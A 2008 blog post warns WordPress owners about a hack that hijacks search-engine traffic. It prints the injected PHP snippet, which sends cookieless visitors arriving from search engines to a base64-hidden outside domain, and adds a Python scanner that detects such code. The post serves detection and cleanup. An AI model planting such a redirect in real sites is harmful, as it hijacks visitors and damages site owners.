Search for this code in your Wordpress blog
June 13th, 2008 by Andreas from Xavier Media
I’ve seen a lot of sites (Shoemoney, Digital Point, Ocaoimh) reporting on a Wordpress hack that will “steal” your search engine traffic. As always, it’s important to upgrade your Wordpress installation (or any software, for that matter) when a new security fix is released. Luckily Wordpress is pretty safe, so you don’t have to upgrade too often, and it’s really easy to upgrade your installation even if you have a few plugins.
This hack is hard for you (the blog owner) to detect since it’s just taking your search engine traffic and will never “steal” any visitors that have accessed your blog before. According to ocaoimh.ie you should look for this code in your .php files (for example wp-blog-header.php):
<?php $seref=array("google","msn","live","altavista","ask","yahoo","aol", "cnn","weather","alexa");
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>
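The reason is visible in the code: it only redirects a visitor whose referrer contains one of the listed search engine names and who sends no cookies. You, the blog owner, will just see your own site/blog (you’re not finding your own blog via a search engine every time you publish a new post, right?).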
Solution: Search your files for weird code, update Wordpress to the latest version and don’t forget to use hard-to-guess passwords.
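One way to do the file search suggested above, as an added example (not code from the original post or from ocaoimh.ie): a small Python scanner that flags .php files combining a referrer check with a redirect header, and decodes any base64_decode("...") literals so you can read the hidden destination. The function names and the sample tree are constructed for illustration; point scan_tree at your own Wordpress directory.

```python
import base64
import binascii
import re
import tempfile
from pathlib import Path

# Traits of the injected snippet quoted above: a referrer check, a redirect
# header, and a base64-encoded string literal hiding the destination.
REFERER = re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_REFERER['\"]\s*\]")
REDIRECT = re.compile(r"header\s*\(\s*['\"]Location:", re.I)
B64_CALL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")

def decode_literals(source):
    """Return the plaintext of every base64_decode("...") string literal."""
    decoded = []
    for blob in B64_CALL.findall(source):
        try:
            text = base64.b64decode(blob, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64 or not plain text; skip it
        decoded.append(text)
    return decoded

def scan_tree(root):
    """Map each suspicious .php file under root to its decoded literals."""
    findings = {}
    for path in sorted(Path(root).rglob("*.php")):
        source = path.read_text(encoding="utf-8", errors="replace")
        if REFERER.search(source) and REDIRECT.search(source):
            findings[str(path.relative_to(root))] = decode_literals(source)
    return findings

def build_sample_tree(root):
    """Constructed sample: one clean file and one carrying the quoted code."""
    root = Path(root)
    (root / "index.php").write_text("<?php require('./wp-blog-header.php'); ?>\n")
    (root / "wp-blog-header.php").write_text(
        '<?php $seref=array("google","msn");\n'
        "$ser=0; foreach($seref as $ref) if(strpos(strtolower("
        "$_SERVER['HTTP_REFERER']),$ref)!==false){ $ser=\"1\"; break; }\n"
        'if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://"'
        '.base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>\n'
    )
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for name, targets in scan_tree(build_sample_tree(tmp)).items():
            print(f"{name}: referrer-based redirect, decoded strings: {targets}")
```

A legitimate plugin can also read the referrer and send redirects, so treat a hit as a file to review by hand, not as proof of compromise.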






